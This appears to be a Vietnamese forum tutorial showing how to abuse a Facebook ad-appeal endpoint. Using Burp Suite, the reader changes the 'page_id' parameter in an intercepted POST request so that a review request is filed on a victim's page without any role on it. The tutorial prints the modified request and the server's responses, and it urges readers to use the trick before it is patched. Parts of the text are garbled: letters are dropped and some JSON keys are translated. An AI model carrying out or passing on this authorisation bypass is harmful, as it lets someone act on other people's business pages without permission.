TUT kháng page hạn chế QC không cần quyền admin (dm ko ghi nguồn bố ánh bản quyền cả lũ) (Tây share cho idol )
Ghi chú : thay attacker_user_id = UID via
attacker_page_id = UID page muốn kháng (k cần quyền admin)
Dùng công cụ Burpsuite
Lẹ không mark fix
1- Truy cập https://www.facebook.com/accountquality ==> Tài khoản Facebook===>chọn bất kỳ trang nào bạn có===>nó sẽ chuyển hướng bạn ến liên kết bên dưới:
https://www.facebook.com/accountquality/attacker_user_id/attacker_page_id/?asset_view_type=customer_feedback
2- Từ phía bên phải màn hình của bạn và bên dưới cụm từ "Không phải Doanh nghiệp Thương mại iện tử", nhấp vào nút Yêu cầu Xem xét.
3- Kiểm tra hai tùy chọn ==> ánh chặn bằng burpsuite ===> nhấn Gửi
bạn sẽ thấy yêu cầu POST như bên dưới:
ĂNG /ads/async/advertiser_dashboard/appeal_information/?reason_for_appeal=1&page_id=Attacker_page_id&additional_info=&session_id=xxxx&__user=10001xxx&__a=1&__dyn=xxxxx
Tham số dễ bị tấn công là "page_id" thay ổi giá trị thành id trang nạn nhân (trang nạn nhân nên có quảng cáo chạy trên trang)
bạn sẽ thấy phản hồi như dưới ây:
cho (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":[],"ACEAdvertiserDashboardAppealStatus":" Saving_failure"},"hsrp":{"hblp":{"sr_revision":1003529876, "nhất quán":{"rev":1003529876}}},"lid":"6945126556416951772"}
ể ảm bảo rằng lỗi thực sự tồn tại, hãy gửi lại yêu cầu với cùng id trang nạn nhân, bạn sẽ thấy phản hồi như bên dưới:
cho (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":["PAGE_APPEAL_IN_PROGRESS"],"ACEAdvertiserDashboardAppealStatus":" Saving_failure"},"hsrp":{"hblp":{"sr_revision" :1003529876,"consistency":{"rev":1003529876}}},"lid":"6945126633837606752"}
Như bạn có thể thấy trong phản hồi ở trên, máy chủ cho chúng tôi biết rằng ""PAGE_APPEAL_IN_PROGRESS"]", có nghĩa là kẻ tấn công ã gửi yêu cầu xem xét trên trang nạn nhân mà không có vai trò nào trên ó.
